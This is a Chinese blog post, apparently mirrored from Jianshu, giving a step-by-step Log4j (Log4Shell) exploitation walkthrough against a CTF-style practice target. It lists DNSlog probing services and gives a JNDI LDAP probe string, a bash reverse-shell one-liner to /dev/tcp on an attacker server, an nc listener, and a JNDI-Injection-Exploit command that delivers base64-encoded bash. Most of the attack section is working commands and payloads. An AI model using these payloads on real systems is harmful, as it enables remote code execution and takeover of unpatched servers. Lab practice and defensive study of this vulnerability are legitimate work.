美文网首页
Log4j反弹shell

Log4j反弹shell

作者: 表弟_212 | 来源:发表于2021-12-13 11:51 被阅读0次

服务器到期的最后几个小时 先操作一波~


image.png

一:准备环境:

1:exp jar包 JNDI-Injection-Exploit
2:利用dnslog平台做初步验证

随意哪个都可以
ceye.io 
dnslog.link 
dnslog.cn 
dnslog.io 
tu4.org awvsscan119.autoverify.cn burpcollaborator.net
sox.cn

3:一台服务器作为反弹shell监听, 如果没有服务器可以去百度下NATappAPP、花生壳等做本机隐射
4:靶机平台百度搜一堆, 封神台、cftshow等
5:注意的坑:服务器端口需要开放, 服务器若是在阿里云、腾讯云直接装宝塔(作为一个PHP叼毛开发用宝塔是真香,商城中的各种环境,文件上传,开端口等~~~)

二: 初入探测是否存在Log4j漏洞

1: 先去dnslog获取一个地址,提交到cft练手(靶机)的平台,看是否存在Log4j日志漏洞


image.png

漏洞基于ldap协议 , 提交到靶场的平台。

${jndi:ldap://e4654ec9.dns.1433.eu.org.}

提交后dns解析返回 , 确定存在该漏洞。


image.png

三: 反弹Log4j漏洞shell

常用的监听shell
bash -i >& /dev/tcp/服务器地址/5555<&2
nc -lvvp 5555

1: 对bash -i 进行base64编码(http://tool.chinaz.com/tools/base64.aspx)
2: 使用 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,base编码内容}|{base64,-d}|{bash,-i}" -A "服务器地址"

3:利用ldap协议,生成的poc直接打

${jndi:ldap://服务器地址/v0tgsl}
image.png

反弹shell:


image.png

相关文章

  • Log4j反弹shell

    【转】Log4j反弹shell - 简书 (jianshu.com)[https://www.jianshu.co...

  • Log4j反弹shell

    服务器到期的最后几个小时 先操作一波~ 一:准备环境: 1:exp jar包 JNDI-Injection-Exp...

  • 【安全记录】反弹shell小记

    前言 本文记录反弹shell的一些注意事项,主要包括:常用反弹shell的payload,获得tty-shell,...

  • nc自启动

    例如开机自启cmd 自启nc反弹shell(一) 自启nc反弹shell(二)

  • kail工具介绍

    反弹Shell https://www.cnblogs.com/cocowool/p/reverse-shell....

  • 反弹shell

    Reverse Shell bash反弹服务端: bash -c 'sh -i &>/dev/tcp/210.28...

  • 反弹shell

    bash -i 操作 攻击机 192.168.188.140执行 nc -lvvp 8888监听本地8888端口 ...

  • Shell反弹

    背景 前段时间因为使用Flink默认配置,没有禁用通过web上传jar包提交作业的功能,同时服务器配有公网地址,也...

  • 反弹shell

    0X01 什么是反弹shell reverse shell,就是控制端监听在某TCP/UDP端口,被控端发起请求到...

  • 反弹Shell

    实验环境 CentOS 6.5:192.168.0.3 kali2.0:192.168.0.4 方法1: 反弹sh...

网友评论

      本文标题:Log4j反弹shell

      本文链接:https://www.haomeiwen.com/subject/ydsjfrtx.html